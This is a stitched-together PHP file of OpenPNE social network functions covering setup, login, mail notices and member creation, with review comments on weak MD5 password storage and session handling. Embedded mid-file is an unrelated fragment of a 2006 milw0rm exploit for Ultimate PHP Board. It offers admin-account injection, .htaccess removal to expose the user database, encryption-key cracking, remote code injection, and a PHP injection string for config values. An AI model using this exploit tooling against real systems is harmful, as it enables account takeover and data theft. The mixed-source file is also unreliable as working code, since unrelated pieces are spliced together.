/**
 * Setup action: checks the installer form and creates the initial records.
 *
 * Every validation failure is collected and handed to handleError() in one
 * call. Otherwise the SNS name, the secure record of member 1 and the first
 * admin user are inserted, and the request is redirected to the
 * "setup done" page.
 *
 * NOTE(review): the member password and the admin password are both stored
 * as a bare md5() digest (no salt, no work factor). Moving to
 * password_hash() / password_verify() has to be coordinated with the code
 * that verifies these columns, which is not part of this function.
 *
 * @param array $requests request values; keys read here: pc_address,
 *                        password, password2, admin_password,
 *                        admin_password2, admin_username, username, SNS_NAME
 */
function execute($requests)
{
    $problems = array();

    // The address must be a valid mail address and must not be a mobile (ktai) one.
    $pc_address_ok = db_common_is_mailaddress($requests['pc_address'])
        && !is_ktai_mail_address($requests['pc_address']);
    if (!$pc_address_ok) {
        $problems[] = 'PCメールアドレスを正しく入力してください';
    }

    // The member password confirmation is only checked in e-mail auth mode.
    if (OPENPNE_AUTH_MODE == 'email' && $requests['password'] !== $requests['password2']) {
        $problems[] = 'パスワードが一致していません';
    }

    if ($requests['admin_password'] !== $requests['admin_password2']) {
        $problems[] = '管理用パスワードが一致していません';
    }

    if (OPENPNE_AUTH_MODE == 'slavepne') {
        // Presumably verifies the credentials against the configured auth
        // storage; anything other than boolean true is treated as a failure.
        $auth_config = get_auth_config(false);
        $storage = Auth::_factory($auth_config['storage'], $auth_config['options']);
        $verified = $storage->fetchData($requests['username'], $requests['password'], false);
        if ($verified !== true) {
            $problems[] = 'ログインIDまたはパスワードが一致しません';
        }
    }

    if (OPENPNE_AUTH_MODE == 'pneid') {
        $login_id = $requests['username'];
        if (is_null($login_id) || $login_id === '') {
            $problems[] = 'ログインIDを入力してください';
        } elseif (!preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\\-_]+[a-zA-Z0-9]$/i', $login_id)) {
            $problems[] = 'ログインIDは4~30文字の半角英数字、記号(アンダーバー「_」、ハイフン「-」)で入力してください';
        } else {
            // The pattern only guarantees three characters; the 4..30 bound is enforced here.
            $width = mb_strwidth($login_id, 'UTF-8');
            if ($width < 4) {
                $problems[] = "ログインIDは半角4文字以上で入力してください";
            } elseif ($width > 30) {
                $problems[] = "ログインIDは半角30文字以内で入力してください";
            }
        }
    }

    if ($problems) {
        // NOTE(review): presumably handleError() does not return; if it does,
        // the inserts below still run with the rejected values. Confirm.
        $this->handleError($problems);
    }

    // c_admin_config: SNS_NAME
    $config_row = array(
        'name' => 'SNS_NAME',
        'value' => $requests['SNS_NAME'],
    );
    db_insert('c_admin_config', $config_row);

    // c_member_secure: the first member always gets c_member_id 1.
    $secure_row = array(
        'c_member_id' => 1,
        'hashed_password' => md5($requests['password']),
        'hashed_password_query_answer' => '',
        'pc_address' => t_encrypt($requests['pc_address']),
        'ktai_address' => '',
        'regist_address' => t_encrypt($requests['pc_address']),
        'easy_access_id' => '',
    );
    if (OPENPNE_AUTH_MODE == 'slavepne' && !IS_SLAVEPNE_EMAIL_REGIST) {
        $secure_row['ktai_address'] = t_encrypt('*****@*****.**');
    }
    db_insert('c_member_secure', $secure_row);

    // c_admin_user: the first admin account, with full privileges ('all').
    $admin_row = array(
        'username' => $requests['admin_username'],
        'password' => md5($requests['admin_password']),
        'auth_type' => 'all',
    );
    db_insert('c_admin_user', $admin_row);

    // Outside e-mail mode the login ID is stored separately for member 1.
    if (OPENPNE_AUTH_MODE != 'email') {
        db_member_insert_username(1, $requests['username']);
    }

    openpne_redirect('setup', 'page_setup_done');
}
/**
 * Shibboleth login using setAuth.
 *
 * The address comes from get_attribute(); when it maps to an existing member
 * the auth object is marked as authenticated and the session cookie is
 * (re)issued. When it does not, the user may be auto-registered, but this
 * call still reports failure.
 *
 * NOTE(review): the name handed to setAuth() is whatever sits in
 * $this->auth->post[...]. This method overwrites that entry only when
 * IS_SLAVEPNE is false and $is_encrypt_username is set, so in every other
 * case the authenticated identity depends on how factory() fills the post
 * array. Confirm it cannot differ from the member looked up by $address.
 *
 * NOTE(review): the session cookie is sent without the secure / httponly
 * arguments, and no session id regeneration is visible here. Confirm both
 * are handled elsewhere (e.g. in setAuth() or adjust_cookie()).
 *
 * @access public
 * @param bool $is_save_cookie      keep the cookie for 30 days instead of the browser session
 * @param bool $is_encrypt_username store the t_encrypt()ed address as the posted username
 * @return bool true on successful login, false otherwise
 */
public function login($is_save_cookie = false, $is_encrypt_username = false)
{
    $this->auth =& $this->factory(true);

    // Login fails when the essential attribute is empty.
    $address = $this->get_attribute();
    if (!$address) {
        return false;
    }

    // IS_SLAVEPNE is expected to be false under Shibboleth.
    if (!IS_SLAVEPNE && $is_encrypt_username) {
        $this->auth->post[$this->auth->_postUsername] = t_encrypt($address);
    }

    // Unknown address: optionally register the user, but do not log in now.
    if (!db_member_c_member_id4pc_address($address)) {
        if (OPENPNE_SHIB_AUTO_REGIST) {
            $this->register_user($address);
        }
        return false;
    }

    $this->auth->setAuth($this->auth->post[$this->auth->_postUsername]);
    if (OPENPNE_SESSION_CHECK_URL) {
        $this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
    }
    $this->sess_id = session_id();

    // 2592000 seconds = 30 days; 0 makes it a browser-session cookie.
    $expire = $is_save_cookie ? time() + 2592000 : 0;

    // The mobile (ktai) case is not considered: $this->ktai is false under Shibboleth.
    setcookie(session_name(), session_id(), $expire, $this->cookie_path);
    $this->adjust_cookie();

    return true;
}
/**
 * Notifies a member by mail that they became administrator of a community.
 *
 * The PC address is preferred. Without one, the mobile (ktai) template is
 * used and a login URL is added to the template parameters.
 *
 * NOTE(review): the mobile login URL carries the member's username as a
 * t_encrypt()ed `kad` parameter, so its confidentiality in transit and in
 * mailboxes rests entirely on t_encrypt() and its key.
 *
 * @param int $c_member_id_to member who receives the mail
 * @param int $c_commu_id     community concerned
 * @return mixed whatever fetch_send_mail() returns
 */
function do_common_send_mail_c_commu_admin_change($c_member_id_to, $c_commu_id)
{
    $recipient = db_member_c_member4c_member_id($c_member_id_to, true);
    $community = db_commu_c_commu4c_commu_id($c_commu_id);

    $mail_params = array(
        'c_member_to' => $recipient,
        'c_commu' => $community,
    );

    // PC address available: send the PC template and stop.
    if (!empty($recipient['secure']['pc_address'])) {
        return fetch_send_mail(
            $recipient['secure']['pc_address'],
            'm_pc_c_commu_admin_change',
            $mail_params
        );
    }

    // Mobile only: add a login link that pre-fills the (encrypted) username.
    $username = db_member_username4c_member_id($recipient['c_member_id'], true);
    $mail_params['login_url'] = openpne_gen_url(
        'ktai',
        'page_o_login',
        array('kad' => t_encrypt($username))
    );

    return fetch_send_mail(
        $recipient['secure']['ktai_address'],
        'm_ktai_c_commu_admin_change',
        $mail_params
    );
}
/**
 * Mobile "easy login": authenticates by the handset identifier alone.
 *
 * The member is looked up from OpenPNE_KtaiID::getID(); no password is
 * checked in this action. On success the auth session is established and
 * the request is redirected to the target described by `login_params`.
 *
 * NOTE(review): setAuth() is called before the login-rejected and blacklist
 * checks, so the auth session may already be marked authenticated when those
 * checks refuse the login. Presumably ktai_display_error() terminates the
 * request; confirm the session is not usable afterwards.
 *
 * NOTE(review): `login_params` comes from the request and decides the module
 * and action of the final redirect, and the session id is added to the
 * redirect parameters as `ksid`. Confirm openpne_redirect() only builds
 * in-application URLs and that the session id is not exposed through logs
 * or referrers.
 *
 * @param array $requests request values; keys read here: ktai_address, login_params
 */
function execute($requests)
{
    $c_member_id = db_member_c_member_id4easy_access_id(OpenPNE_KtaiID::getID());
    if (!$c_member_id) {
        // Authentication error: no member is bound to this handset id.
        $failure = array(
            'msg' => 14,
            'kad' => t_encrypt($requests['ktai_address']),
            'login_params' => $requests['login_params'],
        );
        openpne_redirect('ktai', 'page_o_login', $failure);
    }

    $c_member = db_member_c_member4c_member_id($c_member_id, true);

    @session_name('OpenPNEktai');

    $config = get_auth_config(true);
    $auth = new OpenPNE_Auth($config);
    $auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']);
    $auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']);
    $this->_auth =& $auth;

    if (LOGIN_CHECK_ENABLE) {
        // Repeated-failure (illegal login) check.
        include_once 'OpenPNE/LoginChecker.php';
        $checker_options = array(
            'check_num' => LOGIN_CHECK_NUM,
            'check_time' => LOGIN_CHECK_TIME,
            'reject_time' => LOGIN_REJECT_TIME,
        );
        $lc = new OpenPNE_LoginChecker($checker_options);
        if ($lc->is_rejected()) {
            // Authentication error: the client is currently locked out.
            $lc->fail_login();
            $rejected = array(
                'msg' => '0',
                'login_params' => $requests['login_params'],
            );
            openpne_redirect('ktai', 'page_o_login', $rejected);
        }
    }

    $auth->auth =& $auth->factory(true);

    // In e-mail mode the stored username is kept in its t_encrypt()ed form.
    $username = db_member_username4c_member_id($c_member_id, true);
    if (OPENPNE_AUTH_MODE == 'email') {
        $username = t_encrypt($username);
    }

    $auth->auth->setAuth($username);
    $auth->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
    $auth->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);

    if (OPENPNE_ONE_SESSION_PER_USER) {
        db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id());
    }

    // Both refusals show the same generic message on purpose.
    if (db_member_is_login_rejected($c_member_id)) {
        ktai_display_error('ログインできませんでした。');
    }
    if (db_member_is_blacklist($c_member_id)) {
        ktai_display_error('ログインできませんでした。');
    }

    db_member_do_access($c_member_id);

    // Decide where to go after login; login_params is a query string.
    $query = array();
    if ($requests['login_params']) {
        parse_str($requests['login_params'], $query);
    }
    $action = !empty($query['a']) ? $query['a'] : '';
    $module = !empty($query['m']) ? $query['m'] : 'ktai';

    // Never bounce back to the login page itself.
    if ($module == 'ktai' && $action == 'page_o_login') {
        $action = '';
    }

    $_SESSION['c_member_id'] = $c_member_id;
    $query['ksid'] = session_id();

    openpne_redirect($module, $action, $query);
}
# OPENPNE_DIR/bin/tool_create_member.php
# cd OPENPNE_DIR/bin/
# php tool_create_member.php
#
# Bulk-creates dummy members in batches, writing straight to c_member and
# c_member_secure.
#
# NOTE(review): every generated account gets the same fixed password, stored
# as a bare MD5 digest, and the rows bypass the application's registration
# path. Treat this as a load-test fixture only; it should never be run
# against a database that holds real members.
#
# NOTE(review): the statements are assembled by string concatenation. The
# interpolated values are integers, literals and t_encrypt() output; this
# assumes t_encrypt() never returns a double quote or a backslash. Confirm,
# or switch to placeholders if the DB layer supports them.
require_once './config.inc.php';
require_once OPENPNE_WEBAPP_DIR . '/init.inc';

print "start\n";

$want_member_num = 380000;
$db =& db_get_instance();

// Rows per INSERT statement.
$matome_num = 1000;

$member_insert = "INSERT INTO `c_member` (c_member_id, nickname, birth_year, birth_day, c_password_query_id, c_member_id_invite, is_receive_mail, is_receive_ktai_mail, is_receive_daily_news, public_flag_birth_year, public_flag_birth_month_day) VALUES ";
$secure_insert = "INSERT INTO `c_member_secure` (c_member_id, hashed_password, pc_address, regist_address) VALUES ";

for ($i = 0; $i < $want_member_num; $i += $matome_num) {
    $member_rows = array();
    $secure_rows = array();

    // Always a full batch: the total is only exact when it is a multiple of $matome_num.
    for ($j = 0; $j < $matome_num; $j++) {
        $member_id = 1 + ($i + $j);

        $member_rows[] = '(' . $member_id . ',"hoge",2001,10,10,0,1,1,1,"public","public")';

        $pc_address = t_encrypt("sns" . $member_id . "@example.com");
        $regist_address = t_encrypt("sns" . $member_id . "@example.com");
        $secure_rows[] = '(' . $member_id . ',md5("pohigepoihge"),"' . $pc_address . '","' . $regist_address . '")';
    }

    $sql = $member_insert . implode(",", $member_rows);
    $sql2 = $secure_insert . implode(",", $secure_rows);

    // The query results are not inspected; a failed batch goes unnoticed.
    $result = $db->query($sql);
    $result = $db->query($sql2);

    print $i . ",";
}

print "end\n";
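/**
 * Sends the schedule notification mail for today's schedules.
 *
 * Today's schedules are grouped per participating member, then each member
 * gets one mail listing their schedules: to the PC address when one is set,
 * otherwise to the mobile (ktai) address together with a login URL.
 *
 * The date is derived from a single clock read so that year, month and day
 * always belong to the same day, even when the job runs across midnight.
 *
 * NOTE(review): the mobile login URL carries the member's username as a
 * t_encrypt()ed `kad` parameter; its confidentiality in the mailbox rests on
 * t_encrypt() and its key.
 */
function biz_do_common_send_schedule_mail()
{
    // One timestamp for all three components (separate date() calls could
    // straddle a day boundary and yield a date that never existed).
    $now = time();
    $y = date("Y", $now);
    $m = date("m", $now);
    $d = date("d", $now);

    $c_schedule_list = biz_getDateSchedule($y, $m, $d);

    // c_member_id => list of schedule records that member takes part in.
    $send_list = array();
    foreach ($c_schedule_list as $schedule_id) {
        $value = biz_getScheduleInfo($schedule_id);
        $biz_schedule_member = biz_getJoinIdSchedule($value['biz_schedule_id']);
        foreach ($biz_schedule_member as $c_member_id) {
            $send_list[$c_member_id][] = $value;
        }
    }

    foreach ($send_list as $c_member_id => $member_schedules) {
        $c_member_secure = db_member_c_member_secure4c_member_id($c_member_id);

        if (!empty($c_member_secure['pc_address'])) {
            // A PC address exists: send to the PC address only.
            $pc_address = $c_member_secure['pc_address'];
            $params = array(
                'c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id),
                'c_schedule_list' => $member_schedules,
            );
            fetch_send_mail($pc_address, 'm_pc_schedule_mail', $params);
        } else {
            // No PC address: send to the mobile address only.
            $ktai_address = $c_member_secure['ktai_address'];
            $p = array('kad' => t_encrypt(db_member_username4c_member_id($c_member_id, true)));
            $login_url = openpne_gen_url('ktai', 'page_o_login', $p);
            $params = array(
                'c_member' => db_member_c_member4c_member_id_LIGHT($c_member_id),
                'login_url' => $login_url,
                'c_schedule_list' => $member_schedules,
            );
            fetch_send_mail($ktai_address, 'm_ktai_schedule_mail', $params);
        }
    }
}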
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) { $cypher_len = strlen($_REQUEST['cypher']); $offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']); print "Offset:"; for ($x = 0; $x < $cypher_len; $x++) { print $offset[$x] . ':'; } print '<br>'; $validKeys = 0; $y = 0; for ($y = 255; $y >= 0; $y--) { $newKey[$y] = gen_collision($offset, $y); $key_len = strlen($newKey[$y]); print "<br>Key:{$y} = "; for ($x = 0; $x <= $key_len; $x++) { print $newKey[$y][$x]; } print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]); print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>"; } exit; } } } } } print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . 
$_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . 
" method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>"; ?> # milw0rm.com [2006-06-20]
/**
 * Performs the login from the current request.
 *
 * The posted username is optionally lower-cased and/or t_encrypt()ed before
 * the auth object processes it. On success, the URL and user agent may be
 * pinned into the auth data and, for non-mobile clients, the session cookie
 * is re-sent with the chosen lifetime.
 *
 * NOTE(review): the session cookie is sent without the secure / httponly
 * arguments, and no session id regeneration is visible in this method.
 * Confirm both are handled elsewhere (e.g. inside the auth object).
 *
 * @param bool $is_save_cookie whether to give the cookie an expiry (30 days)
 *                             instead of making it a browser-session cookie
 * @return bool true when the user is authenticated, false otherwise
 */
function login($is_save_cookie = false)
{
    $this->auth =& $this->factory(true);

    // Normalise the posted username in place before authentication runs.
    $field = $this->auth->_postUsername;
    if ($this->is_lowercase_username) {
        $this->auth->post[$field] = strtolower($this->auth->post[$field]);
    }
    if ($this->is_encrypt_username) {
        $this->auth->post[$field] = t_encrypt($this->auth->post[$field]);
    }

    $this->auth->start();
    if (!$this->auth->getAuth()) {
        return false;
    }

    // Values pinned into the session at login time.
    if (OPENPNE_SESSION_CHECK_URL) {
        $this->auth->setAuthData('OPENPNE_URL', OPENPNE_URL);
    }
    if ($this->is_check_user_agent) {
        $this->auth->setAuthData('USER_AGENT', $_SERVER['HTTP_USER_AGENT']);
    }

    $this->sess_id = session_id();

    // No cookie is sent here for mobile (ktai) clients.
    if (!$this->is_ktai) {
        // 2592000 seconds = 30 days; 0 makes it a browser-session cookie.
        $expire = $is_save_cookie ? time() + 2592000 : 0;
        setcookie(session_name(), session_id(), $expire, $this->cookie_path);
    }

    return true;
}
/**
 * Confirms a pending mobile (ktai) mail address registration.
 *
 * The pending record is found by its `ses` token, the address is re-checked
 * for availability and the member's password is verified. Depending on
 * IS_GET_EASY_ACCESS_ID the handset identifier is required (2 or 3),
 * optional (1) or ignored (anything else).
 *
 * NOTE(review): the flow relies on openpne_redirect() and
 * ktai_display_error() ending the request. If either returns, execution
 * continues into the update statements below. Confirm.
 *
 * NOTE(review): the blacklist lookup keys on md5() of the handset
 * identifier. That is a lookup key rather than a credential hash, but an
 * unsalted digest of a low-entropy identifier is easy to reverse if the
 * blacklist table leaks.
 *
 * @param array $requests request values; keys read here: ses, password
 */
function execute($requests)
{
    // --- request variables
    $ses = $requests['ses'];
    $password = $requests['password'];
    // ----------

    // Is the pending-registration session valid? If not, back to login.
    $pre = db_member_c_ktai_address_pre4session($ses);
    if (!$pre) {
        openpne_redirect('ktai', 'page_o_login');
    }

    // Can this mail address still be registered for this member?
    if (!util_is_regist_mail_address($pre['ktai_address'], $pre['c_member_id'])) {
        openpne_redirect('ktai', 'page_o_login', array('msg' => 42));
    }

    $c_member_id = $pre['c_member_id'];
    $ktai_address = $pre['ktai_address'];

    // Password check.
    if (!db_common_authenticate_password($c_member_id, $password, true)) {
        openpne_redirect('ktai', 'page_o_login2', array('msg' => 18, 'ses' => $ses));
    }

    // 2 or 3: the handset identifier is mandatory; 1: it is optional.
    $id_required = (IS_GET_EASY_ACCESS_ID == 2 || IS_GET_EASY_ACCESS_ID == 3);
    $id_optional = !$id_required && IS_GET_EASY_ACCESS_ID == 1;

    if ($id_required || $id_optional) {
        $easy_access_id = OpenPNE_KtaiID::getID();

        if ($easy_access_id) {
            // The identifier must not already belong to a different member.
            $owner_id = db_member_c_member_id4easy_access_id($easy_access_id);
            if ($owner_id && $c_member_id != $owner_id) {
                openpne_redirect('ktai', 'page_o_login2', array('msg' => 39, 'ses' => $ses));
            }

            if (db_member_easy_access_id_is_blacklist(md5($easy_access_id))) {
                ktai_display_error('携帯メールアドレスを登録できませんでした。');
            }

            // update
            db_member_update_easy_access_id($c_member_id, $easy_access_id);
            db_member_update_ktai_address($c_member_id, $ktai_address);
            db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']);

            openpne_redirect('ktai', 'do_o_easy_login');
        } elseif ($id_required) {
            // The mandatory handset identifier could not be obtained.
            openpne_redirect('ktai', 'page_o_login2', array('msg' => 27, 'ses' => $ses));
        }
    }

    // Registration without a handset identifier.
    db_member_update_ktai_address($c_member_id, $ktai_address);
    db_member_delete_ktai_address_pre($pre['c_ktai_address_pre_id']);

    // Redirect to the login page with the (encrypted) username pre-filled.
    $username = db_member_username4c_member_id($c_member_id, true);
    openpne_redirect('ktai', 'page_o_login', array('msg' => 19, 'kad' => t_encrypt($username)));
}
/**
 * Mobile (ktai) login action.
 *
 * Runs the optional repeated-failure check and the auth login, resolves the
 * member from the authenticated username (auto-creating it in slavepne
 * mode), applies the rejected/blacklist checks and finally redirects to the
 * target described by `login_params`.
 *
 * NOTE(review): the rejected/blacklist checks run after $auth->login() has
 * succeeded, so the auth session may already be marked authenticated when
 * they refuse the login. Presumably ktai_display_error() terminates the
 * request; confirm the session is not usable afterwards.
 *
 * NOTE(review): `login_params` comes from the request and decides the module
 * and action of the final redirect, and the session id is added to the
 * redirect parameters as `ksid`. Confirm openpne_redirect() only builds
 * in-application URLs and that the session id is not exposed through logs
 * or referrers.
 *
 * NOTE(review): in slavepne mode the new member is created from
 * $_POST['username'] rather than from $auth->getUsername(); confirm the two
 * cannot differ.
 *
 * @param array $requests request values; keys read here: c_member_id,
 *                        ktai_address, password, login_params
 */
function execute($requests)
{
    // --- request variables
    // $c_member_id is replaced below by the id of the authenticated member.
    $c_member_id = $requests['c_member_id'];
    $ktai_address = $requests['ktai_address'];
    $password = $requests['password'];
    // ----------

    @session_name('OpenPNEktai');

    $config = get_auth_config(true);
    $auth = new OpenPNE_Auth($config);
    $auth->setExpire($GLOBALS['OpenPNE']['ktai']['session_lifetime']);
    $auth->setIdle($GLOBALS['OpenPNE']['ktai']['session_idletime']);
    $this->_auth =& $auth;

    // Optional repeated-failure (illegal login) checker.
    $lc = null;
    if (LOGIN_CHECK_ENABLE) {
        include_once 'OpenPNE/LoginChecker.php';
        $checker_options = array(
            'check_num' => LOGIN_CHECK_NUM,
            'check_time' => LOGIN_CHECK_TIME,
            'reject_time' => LOGIN_REJECT_TIME,
        );
        $lc = new OpenPNE_LoginChecker($checker_options);
    }

    // A locked-out client is refused without attempting the login at all.
    $refused = ($lc !== null && $lc->is_rejected()) || !$auth->login();
    if ($refused) {
        // Authentication error.
        if ($lc !== null) {
            $lc->fail_login();
        }
        $failure = array(
            'msg' => '0',
            'kad' => t_encrypt($ktai_address),
            'login_params' => $requests['login_params'],
        );
        openpne_redirect('ktai', 'page_o_login', $failure);
    }

    $c_member_id = db_member_c_member_id4username_encrypted($auth->getUsername(), true);
    if (OPENPNE_AUTH_MODE == 'slavepne' && !$c_member_id) {
        // First login of an externally authenticated user: create the member.
        $c_member_id = db_member_create_member($_POST['username']);
    }

    if (!$c_member_id) {
        $failure = array(
            'msg' => '0',
            'kad' => t_encrypt($ktai_address),
            'login_params' => $requests['login_params'],
        );
        openpne_redirect('ktai', 'page_o_login', $failure);
    }

    if (OPENPNE_ONE_SESSION_PER_USER) {
        db_member_update_c_member_secure_insert_sess_id($c_member_id, session_id());
    }

    // Both refusals show the same generic message on purpose.
    if (db_member_is_login_rejected($c_member_id)) {
        ktai_display_error('ログインできませんでした。');
    }
    if (db_member_is_blacklist($c_member_id)) {
        ktai_display_error('ログインできませんでした。');
    }

    db_member_do_access($c_member_id);

    // Decide where to go after login; login_params is a query string.
    $query = array();
    if ($requests['login_params']) {
        parse_str($requests['login_params'], $query);
    }
    $action = !empty($query['a']) ? $query['a'] : '';
    $module = !empty($query['m']) ? $query['m'] : 'ktai';

    // Never bounce back to the login page itself.
    if ($module == 'ktai' && $action == 'page_o_login') {
        $action = '';
    }

    $_SESSION['c_member_id'] = $c_member_id;
    $query['ksid'] = session_id();

    openpne_redirect($module, $action, $query);
}
/**
 * Sends the "message received" notification to a member's mobile (ktai)
 * address on behalf of the admin tool.
 *
 * The template receives both member records, the message subject and body,
 * and a login URL for the mobile site.
 *
 * NOTE(review): the login URL carries the recipient's username as a
 * t_encrypt()ed `kad` parameter; its confidentiality in the mailbox rests on
 * t_encrypt() and its key.
 *
 * @param int    $c_member_id_to   recipient member
 * @param int    $c_member_id_from sending member
 * @param string $subject          message subject
 * @param string $body             message body
 * @return mixed whatever admin_fetch_send_mail() returns
 */
function do_admin_send_message_mail_send_ktai($c_member_id_to, $c_member_id_from, $subject, $body)
{
    // Loaded with the secure part to get the address and the mail preference.
    $recipient = db_member_c_member4c_member_id($c_member_id_to, true);
    $to_address = $recipient['secure']['ktai_address'];
    $wants_ktai_mail = $recipient['is_receive_ktai_mail'];

    $username = db_member_username4c_member_id($recipient['c_member_id'], true);
    $login_url = openpne_gen_url('ktai', 'page_o_login', array('kad' => t_encrypt($username)));

    // The template gets the member records without the secure part.
    $template_params = array(
        'c_member_to' => db_member_c_member4c_member_id($c_member_id_to),
        'c_member_from' => db_member_c_member4c_member_id($c_member_id_from),
        'login_url' => $login_url,
        'subject' => $subject,
        'body' => $body,
    );

    return admin_fetch_send_mail($to_address, 'm_ktai_message_zyushin', $template_params, $wants_ktai_mail);
}
/**
 * Creates the member records automatically when a user has logged in but no
 * member information exists yet.
 *
 * Three rows are written in turn (c_member, c_member_secure, c_username).
 * When a later insert fails, the rows already written are deleted again by
 * hand and false is returned.
 *
 * NOTE(review): the cleanup is a manual compensation, not a transaction; a
 * failure of one of the DELETE statements would leave orphaned rows.
 *
 * NOTE(review): hashed_password is stored empty, which presumably makes
 * password login impossible for such a member. Confirm that the password
 * check elsewhere never accepts an empty stored hash.
 *
 * @param string $username login name to bind to the new member
 * @return mixed the new c_member_id, or false on failure
 */
function db_member_create_member($username)
{
    // Placeholder profile; the user is expected to fill it in later.
    $member_row = array(
        'nickname' => 'NO NAME',
        'birth_year' => 0,
        'birth_month' => 0,
        'birth_day' => 0,
        'public_flag_birth_year' => 'public',
        'public_flag_birth_month_day' => 'public',
        'c_member_id_invite' => 1,
        'c_password_query_id' => 0,
        'is_receive_mail' => true,
        'is_receive_ktai_mail' => true,
        'is_receive_daily_news' => true,
        'r_date' => db_now(),
        'u_datetime' => db_now(),
        'image_filename' => '',
        'image_filename_1' => '',
        'image_filename_2' => '',
        'image_filename_3' => '',
        'rss' => '',
    );
    $c_member_id = db_insert('c_member', $member_row);
    if (!$c_member_id) {
        return false;
    }

    $secure_row = array(
        'c_member_id' => intval($c_member_id),
        'hashed_password' => "",
        'hashed_password_query_answer' => "",
        'pc_address' => "",
        'ktai_address' => "",
        'regist_address' => "",
        'easy_access_id' => '',
    );
    if (!IS_SLAVEPNE_EMAIL_REGIST) {
        // Without e-mail registration, per-member placeholder addresses are stored.
        $secure_row['pc_address'] = t_encrypt($c_member_id . '@pc.example.com');
        $secure_row['ktai_address'] = t_encrypt($c_member_id . '@ktai.example.com');
    }
    if (!db_insert('c_member_secure', $secure_row)) {
        // Undo the c_member insert.
        db_query('DELETE FROM c_member WHERE c_member_id = ?', array($c_member_id));
        return false;
    }

    $username_row = array(
        'c_member_id' => intval($c_member_id),
        'username' => $username,
    );
    if (!db_insert('c_username', $username_row)) {
        // Undo both earlier inserts.
        db_query('DELETE FROM c_member WHERE c_member_id = ?', array($c_member_id));
        db_query('DELETE FROM c_member_secure WHERE c_member_id = ?', array($c_member_id));
        return false;
    }

    return $c_member_id;
}